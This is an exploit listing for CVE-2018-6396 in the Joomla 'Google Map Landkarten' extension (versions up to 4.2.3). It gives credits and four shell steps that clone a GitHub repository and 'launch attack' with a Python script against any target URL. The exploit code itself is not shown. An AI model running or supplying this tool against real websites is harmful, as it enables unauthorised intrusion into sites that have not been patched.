Date: 03/03/2018

Vendor Homepage: http://www.joomla-24.de/

Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/

Version: <= 4.2.3

Tested on: KaLi Linux 2018.1

CVE: CVE-2018-6396

Discovered by: Ihsan Sencan

Exploit by: Javier Olmedo

Clone this repository

git clone https://github.com/JJavierOlmedo/joomla-cve-2018-6396.git

Go to local repository

cd joomla-cve-2018-6396

Change the access permissions

sudo chmod +x joomla-cve-2018-6396.py

Launch attack!!

python3 joomla-cve-2018-6396.py -u <TARGET>